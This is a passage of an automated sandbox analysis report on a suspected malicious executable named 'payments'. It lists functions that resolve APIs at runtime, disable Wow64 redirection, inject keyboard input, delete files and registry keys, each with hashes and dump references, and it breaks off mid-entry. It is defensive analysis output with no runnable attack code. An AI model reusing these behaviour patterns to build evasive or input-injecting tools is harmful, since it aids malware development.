                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00C941BB,00C94341,?,00C9422F,?,00C941BB,?,?,?,?,00C939FE,?,00000001), ref: 00C94359
                                                                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C9436B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                          • API String ID: 2574300362-3689287502
                                                                                                                          • Opcode ID: 7c1d5e56cc76cd7cf54918158f6f98dbc39df6600aa337ef96e9f52d68d46ce3
                                                                                                                          • Instruction ID: c729cbbab3402d02c8dacd1c581228a0f13088d902810590dee650efa0ceafb1
                                                                                                                          • Opcode Fuzzy Hash: 7c1d5e56cc76cd7cf54918158f6f98dbc39df6600aa337ef96e9f52d68d46ce3
                                                                                                                          • Instruction Fuzzy Hash: F3D0A730504712BFCB344F34E80CA4576E4BB20B15B108429F491D2260DBB0D8C58A30
                                                                                                                          Function 00CD0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00CD052F,?,00CD06D7), ref: 00CD0572
                                                                                                                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00CD0584
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                          • API String ID: 2574300362-1587604923
                                                                                                                          • Opcode ID: f4a81b2b088486c33f1ea604a7c22e4b5e03131891ce2294cc03f0ef8471c128
                                                                                                                          • Instruction ID: 9a730d9223bd06aaf014d78471552a62c7a255b1a04223d60356a9ac24fe23f6
                                                                                                                          • Opcode Fuzzy Hash: f4a81b2b088486c33f1ea604a7c22e4b5e03131891ce2294cc03f0ef8471c128
                                                                                                                          • Instruction Fuzzy Hash: 33D09E70904722AFD7205F65A808B52BBE5AF04711FA0851AED55D2350EB70D5C98A70
                                                                                                                          Function 00CD0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,00CD051D,?,00CD05FE), ref: 00CD0547
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00CD0559
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                          • API String ID: 2574300362-1071820185
                                                                                                                          • Opcode ID: a88d34e0b3e11905dfa904067a1b80b7cec24046f580e76d3575039a840115bb
                                                                                                                          • Instruction ID: 947432225f02d91da8ed28e4905441d013062407f2cca808d23839931c57ca81
                                                                                                                          • Opcode Fuzzy Hash: a88d34e0b3e11905dfa904067a1b80b7cec24046f580e76d3575039a840115bb
                                                                                                                          • Instruction Fuzzy Hash: 84D09E70544722AFD7209F65A80865176A5AF14711FE0C41AE956D2350EB70C9898A60
                                                                                                                          Function 00CEECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00CEECBE,?,00CEEBBB), ref: 00CEECD6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00CEECE8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                          • API String ID: 2574300362-1816364905
                                                                                                                          • Opcode ID: adfb1a23985aca2428eec34cf816137add3c372349240f5872a03354f2209d54
                                                                                                                          • Instruction ID: c8a29ac5cf1348861c0c8bd56693c8c2fd268c2c9b3d5ec6ec5ccc90b87872a5
                                                                                                                          • Opcode Fuzzy Hash: adfb1a23985aca2428eec34cf816137add3c372349240f5872a03354f2209d54
                                                                                                                          • Instruction Fuzzy Hash: 3FD0C770500723BFDB245F75E84975276E5AB04751B20C429F859D2251DFB0D8C5D670
                                                                                                                          Function 00CEBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00CEBAD3,00000001,00CEB6EE,?,00D2DC00), ref: 00CEBAEB
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CEBAFD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                          • API String ID: 2574300362-199464113
                                                                                                                          • Opcode ID: 29514d4bb9f85626bd677afe0d13c2e22f5a6438f229e7bc5fae8703efb40b79
                                                                                                                          • Instruction ID: 2792795784fa591146cc93b440ef6058867728dd21a1f5feb41c5b31ad9aca50
                                                                                                                          • Opcode Fuzzy Hash: 29514d4bb9f85626bd677afe0d13c2e22f5a6438f229e7bc5fae8703efb40b79
                                                                                                                          • Instruction Fuzzy Hash: 12D0C770900752FFD7345FA5E848B6276E9AB04751B108429F857D2254DF70DCC5C674
                                                                                                                          Function 00CF3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00CF3BD1,?,00CF3E06), ref: 00CF3BE9
                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00CF3BFB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                          • API String ID: 2574300362-4033151799
                                                                                                                          • Opcode ID: f2d1f5a4fd8deebdca43c79cfcb323dd086f52f7b93c002f5c37c6f6d6382b3d
                                                                                                                          • Instruction ID: c46871edf9a1fe068bd03141bafb6da25fc35da20cc3b2dbd9b8bfe597594d22
                                                                                                                          • Opcode Fuzzy Hash: f2d1f5a4fd8deebdca43c79cfcb323dd086f52f7b93c002f5c37c6f6d6382b3d
                                                                                                                          • Instruction Fuzzy Hash: C7D0A7F0500756BFC7205F60E808793BAF4AB01314B118419E455E2250DBB4C5C48E30
                                                                                                                          Function 00CC9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b73a055a114c0b017c689be0102cf53da313280b41dd53e1c9dd55b0a737a1f0
                                                                                                                          • Instruction ID: 480c49ea2297a56bd10be07346d9faffcf4cf1ce26336dbdf0471c5c08ff67aa
                                                                                                                          • Opcode Fuzzy Hash: b73a055a114c0b017c689be0102cf53da313280b41dd53e1c9dd55b0a737a1f0
                                                                                                                          • Instruction Fuzzy Hash: A7C11A75A0021AEBDB14DF94C898FAEB7B5FF48710F10459CE916AB251D730DE81DBA0
                                                                                                                          Function 00CEAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00CEAAB4
                                                                                                                          • CoUninitialize.OLE32 ref: 00CEAABF
                                                                                                                            • Part of subcall function 00CD0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CD027B
                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00CEAACA
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00CEAD9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 780911581-0
                                                                                                                          • Opcode ID: 05758087a0b171ae6f129cefc91156f523096844a5eae63e5b812c7fa4911c6f
                                                                                                                          • Instruction ID: 56609520b58a1efb4f96ba51db14d55d2c993bf4ab201eb0407852a4a1d128a7
                                                                                                                          • Opcode Fuzzy Hash: 05758087a0b171ae6f129cefc91156f523096844a5eae63e5b812c7fa4911c6f
                                                                                                                          • Instruction Fuzzy Hash: C2A147352047419FCB10EF29C885B5AB7E5BF88724F148449FA969B3A2CB31FD41DB86
                                                                                                                          Function 00CC91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2808897238-0
                                                                                                                          • Opcode ID: b435c089d009a3e1493fe4a8b9160004f5cb444e8a9abf8c9d4a3173cbbf46db
                                                                                                                          • Instruction ID: d74da10dbe4d5f19ae4059e98ab7a517a26a281efe74f6973081fac0489591ea
                                                                                                                          • Opcode Fuzzy Hash: b435c089d009a3e1493fe4a8b9160004f5cb444e8a9abf8c9d4a3173cbbf46db
                                                                                                                          • Instruction Fuzzy Hash: F551A130600742ABDB249FA6D499F6EB3E5EF45314F28881FE557C72E1DB3098819715
                                                                                                                          Function 00CB365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3877424927-0
                                                                                                                          • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                          • Instruction ID: f7138cd7eb695d08232d74b1f48710d9a0e3fc1b6ebdbf81efe5af10d9419efe
                                                                                                                          • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                          • Instruction Fuzzy Hash: 9F51A1B0A00285ABDB248FA989856EE7BA5BF40320F248729F835962D0DB75DF519B41
                                                                                                                          Function 00CD390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00CD3966
                                                                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00CD3982
                                                                                                                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00CD39EF
                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00CD3A4D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 432972143-0
                                                                                                                          • Opcode ID: 4697c01417940cc37c073c14ccc588915cfcf862434713f9300cc5a5efddd3bd
                                                                                                                          • Instruction ID: 58fe77c6b6b3bc3e24f1d9ab805bafb05edbce500f22f64d2855c532f95a8831
                                                                                                                          • Opcode Fuzzy Hash: 4697c01417940cc37c073c14ccc588915cfcf862434713f9300cc5a5efddd3bd
                                                                                                                          • Instruction Fuzzy Hash: 40414830A00288AEEF218B65CC15BFDBBB69B55311F04015BF6D1923C1CBB48F85E762
                                                                                                                          Function 00CDE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00CDE742
                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 00CDE768
                                                                                                                          • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00CDE78D
                                                                                                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00CDE7B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3321077145-0
                                                                                                                          • Opcode ID: 61a08578215a0bf8df45f3272a1cb742e5c5036cea214c3b13114b57e9d0c1fd
                                                                                                                          • Instruction ID: 956cf372ab5bf0e6ade9997a360093d1eff0e2743c819b8ea1db8ac5a3cf5e16
                                                                                                                          • Opcode Fuzzy Hash: 61a08578215a0bf8df45f3272a1cb742e5c5036cea214c3b13114b57e9d0c1fd
                                                                                                                          • Instruction Fuzzy Hash: C0412739600610DFCF11AF29C44595DBBE5FF59720B098099E916AF3A2CB35FD019B91
                                                                                                                          Function 00CFD7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00CFD807
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00CFD87D
                                                                                                                          • PtInRect.USER32(?,?,00CFED5A), ref: 00CFD88D
                                                                                                                          • MessageBeep.USER32(00000000), ref: 00CFD8FE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1352109105-0
                                                                                                                          • Opcode ID: 2642f00b93b2fec2778ebb8d75bc16b1c543c68d8553d29041594388ce35b89a
                                                                                                                          • Instruction ID: f0b2721291b372c998b6d16fe8653434e4b9cfad2eaee88576ccb7abe9b260c9
                                                                                                                          • Opcode Fuzzy Hash: 2642f00b93b2fec2778ebb8d75bc16b1c543c68d8553d29041594388ce35b89a
                                                                                                                          • Instruction Fuzzy Hash: DF41BF74A0021CEFCB51DF59D884BB97BF6FB45391F1881A5EA16CB290C730EA41CB92
                                                                                                                          Function 00CD3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetKeyboardState.USER32(?,753DC0D0,?,00008000), ref: 00CD3AB8
                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CD3AD4
                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00CD3B34
                                                                                                                          • SendInput.USER32(00000001,?,0000001C,753DC0D0,?,00008000), ref: 00CD3B92
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 432972143-0
                                                                                                                          • Opcode ID: f39febd0dbadb2ba4a32e15d77bae7a02092191a7928b50ee856bd7ec2fc07b5
                                                                                                                          • Instruction ID: e50bdf6a0305e59a2bb3d08e9feb20ba50aa7f7772a086ebe37881d28fee1ab7
                                                                                                                          • Opcode Fuzzy Hash: f39febd0dbadb2ba4a32e15d77bae7a02092191a7928b50ee856bd7ec2fc07b5
                                                                                                                          • Instruction Fuzzy Hash: 62310330A00298BFEF218B648C19BFEBBAA9B56310F04015BE691973D1C7748F46D766
                                                                                                                          Function 00CC4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CC4038
                                                                                                                          • __isleadbyte_l.LIBCMT ref: 00CC4066
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC4094
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00CC40CA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3058430110-0
                                                                                                                          • Opcode ID: 32a9cd920d92d00766fce7e77518eb10fb818fb24279c825d7a37ef29469d589
                                                                                                                          • Instruction ID: 999f110f9637161bbea2bab1770f8e8000c0376741696d8ab238e3185c032ef0
